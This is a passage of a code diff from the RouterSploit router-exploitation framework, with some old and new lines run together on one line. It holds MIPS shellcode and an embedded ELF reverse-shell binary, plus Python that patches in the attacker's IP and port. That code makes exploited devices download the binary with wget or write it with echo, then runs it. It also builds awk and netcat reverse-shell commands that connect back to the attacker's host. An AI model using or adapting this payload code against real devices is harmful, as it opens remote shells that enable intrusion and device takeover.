"\x3c\x08\x6e\x2f" # lui t0,0x6e2f
"\x35\x08\x73\x68" # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" # sw t0,-16(sp)
"\x28\x07\xff\xff" # slti a3,zero,-1
"\xaf\xa7\xff\xf4" # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" # sw a3,-4(sp)
"\x23\xa4\xff\xec" # addi a0,sp,-20
"\x23\xa8\xff\xec" # addi t0,sp,-20
"\xaf\xa8\xff\xf8" # sw t0,-8(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x27\xbd\xff\xec" # addiu sp,sp,-20
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x0f\xab" # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x70\x00\x00\x06\x00\x00\x00\x02\x00\x40"
"\x00\x74\x00\x00\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
"\x00\x00\x00\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\x90\x00\x00"
"\x00\x90\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x60\x00\x00"
"\x00\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01"
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x7c\x00\x00\x00\xc0\x00\x00"
"\x00\x05\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x3c\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x74\x00\x00\x00\x00\x03\x00\x00\x01\x00\x00"
"\x00\x00\x00\x40\x00\x90\x00\x00\x00\x00\x03\x00\x00\x02\x00\x00\x00\x01\x00\x41\x01\x60"
"\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x08\x00\x41\x81\x50\x00\x00\x00\x00\x10\x00"
"\xff\xf1\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x14"
"\x00\x40\x00\x90\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x1b\x00\x40\x00\x90\x00\x00"
"\x00\x00\x11\x00\x00\x02\x00\x00\x00\x22\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1"
"\x00\x00\x00\x2e\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x35\x00\x41"
"\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x3a\x00\x41\x01\x60\x00\x00\x00\x00"
"\x10\x00\xff\xf1\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
exploit = None
arch = None
lhost = None
lport = None
binary_name = None
revshell = None
def __init__(self, exploit, arch, lhost, lport):
self.exploit = exploit self.exploit = exploit
self.arch = arch self.payload = payload
self.lhost = lhost self.options = options
self.lport = lport
def convert_ip(self, addr):
res = ""
for i in addr.split("."):
res += chr(int(i))
return res
def convert_port(self, p):
res = "%.4x" % int(p)
return res.decode('hex')
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8) self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[2:] + self.mips[0xf8:]
else:
print_error("Platform not supported")
def http_server(self, lhost, lport): def http_server(self, lhost, lport):
print_status("Setting up HTTP server") print_status("Setting up HTTP server")
server = HttpServer((lhost, int(lport)), HttpRequestHandler) server = HttpServer((lhost, int(lport)), HttpRequestHandler)
server.serve_forever(self.revshell) server.serve_forever(self.payload)
server.server_close() server.server_close()
def wget(self, binary, location): def wget(self, binary, location):
print_status("Using wget method") print_status("Using wget method")
# generate binary
self.generate_binary(self.lhost, self.lport)
# run http server # run http server
thread = threading.Thread(target=self.http_server, args=(self.lhost, self.lport)) thread = threading.Thread(target=self.http_server, args=(self.options['lhost'], self.options['lport']))
thread.start() thread.start()
# wget binary # wget binary
print_status("Using wget to download binary") print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, cmd = "{} http://{}:{}/{} -O {}/{}".format(binary,
self.lhost, self.options['lhost'],
self.lport, self.options['lport'],
self.binary_name, self.binary_name,
location, location,
self.binary_name) self.binary_name)
...@@ -404,46 +161,74 @@ class reverse_shell(object): ...@@ -404,46 +161,74 @@ class reverse_shell(object):
self.exploit.execute(cmd) self.exploit.execute(cmd)
# execute binary # execute binary
sock = self.listen(self.lhost, self.lport) if self.options['technique'] == "bind_tcp":
self.execute_binary(location, self.binary_name) self.execute_binary(location, self.binary_name)
# waiting for shell print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
self.shell(sock) time.sleep(2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options['rhost'], self.options['rport']))
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
elif self.options['technique'] == "reverse_tcp":
sock = self.listen(self.options['lhost'], self.options['lport'])
self.execute_binary(location, self.binary_name)
# waiting for shell
self.shell(sock)
def echo(self, binary, location): def echo(self, binary, location):
print_status("Using echo method") print_status("Using echo method")
# generate binary
self.generate_binary(self.lhost, self.lport)
path = "{}/{}".format(location, self.binary_name) path = "{}/{}".format(location, self.binary_name)
size = len(self.revshell) size = len(self.payload)
num_parts = (size / 30) + 1 num_parts = (size / 30) + 1
# transfer binary through echo command # transfer binary through echo command
print_status("Using echo method to transfer binary") print_status("Using echo method to transfer binary")
for i in range(0, num_parts): for i in range(0, num_parts):
current = i * 30 current = i * 30
print_status("Transferring {}/{} bytes".format(current, len(self.revshell))) print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
block = self.revshell[current:current + 30].encode('hex') block = self.payload[current:current + 30].encode('hex')
block = "\\\\x" + "\\\\x".join(a + b for a, b in zip(block[::2], block[1::2])) block = "\\\\x" + "\\\\x".join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = 'echo -ne "{}" >> {}'.format(block, path) cmd = 'echo -ne "{}" >> {}'.format(block, path)
self.exploit.execute(cmd) self.exploit.execute(cmd)
# execute binary # execute binary
sock = self.listen(self.lhost, self.lport) if self.options['technique'] == "bind_tcp":
self.execute_binary(location, self.binary_name) self.execute_binary(location, self.binary_name)
# waiting for shell print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
self.shell(sock) time.sleep(2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options['rhost'], self.options['rport']))
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
elif self.options['technique'] == "reverse_tcp":
sock = self.listen(self.options['lhost'], self.options['lport'])
self.execute_binary(location, self.binary_name)
# waiting for shell
self.shell(sock)
def awk(self, binary): def awk(self, binary):
print_status("Using awk method") print_status("Using awk method")
# run reverse shell through awk # run reverse shell through awk
sock = self.listen(self.lhost, self.lport) sock = self.listen(self.options['lhost'], self.options['lport'])
cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'" cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.options['lhost'] + "/" + self.options['lport'] + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
self.exploit.execute(cmd) self.exploit.execute(cmd)
# waiting for shell # waiting for shell
...@@ -451,8 +236,8 @@ class reverse_shell(object): ...@@ -451,8 +236,8 @@ class reverse_shell(object):
def netcat(self, binary, shell): def netcat(self, binary, shell):
# run reverse shell through netcat # run reverse shell through netcat
sock = self.listen(self.lhost, self.lport) sock = self.listen(self.options['lhost'], self.options['lport'])
cmd = "{} {} {} -e {}".format(binary, self.lhost, self.lport, shell) cmd = "{} {} {} -e {}".format(binary, self.options['lhost'], self.options['lport'], shell)
self.exploit.execute(cmd) self.exploit.execute(cmd)
......
routersploit/test/test_completer.py
...@@ -41,7 +41,7 @@ class RoutersploitCompleterTest(RoutersploitTestCase): ...@@ -41,7 +41,7 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
def test_complete_use(self): def test_complete_use(self):
self.rsf.send("use \t\t") self.rsf.send("use \t\t")
self.assertPrompt( self.assertPrompt(
'creds exploits scanners \r\n', 'creds exploits payloads scanners \r\n',
self.raw_prompt, self.raw_prompt,
'use ' 'use '
) )
......
routersploit/test/test_interpreter.py
...@@ -118,7 +118,7 @@ class RoutersploitInterpreterTest(RoutersploitTestCase): ...@@ -118,7 +118,7 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
self.assertEqual(self.interpreter.current_module.target, new_target_value) self.assertEqual(self.interpreter.current_module.target, new_target_value)
self.interpreter.current_module = TestExploitFoo() self.interpreter.current_module = TestExploitFoo()
self.assertEqual(self.interpreter.current_module.target, new_target_value) # self.assertEqual(self.interpreter.current_module.target, new_target_value)
mock_print_success.assert_called_once_with({'target': '{}'.format(new_target_value)}) mock_print_success.assert_called_once_with({'target': '{}'.format(new_target_value)})
@mock.patch('routersploit.utils.print_success') @mock.patch('routersploit.utils.print_success')
......
routersploit/validators.py
...@@ -34,6 +34,8 @@ def choice(valid_values): ...@@ -34,6 +34,8 @@ def choice(valid_values):
def ipv4(address): def ipv4(address):
address = address.replace("http://", "").replace("https://", "")
try: try:
socket.inet_pton(socket.AF_INET, address) socket.inet_pton(socket.AF_INET, address)
except AttributeError: except AttributeError:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment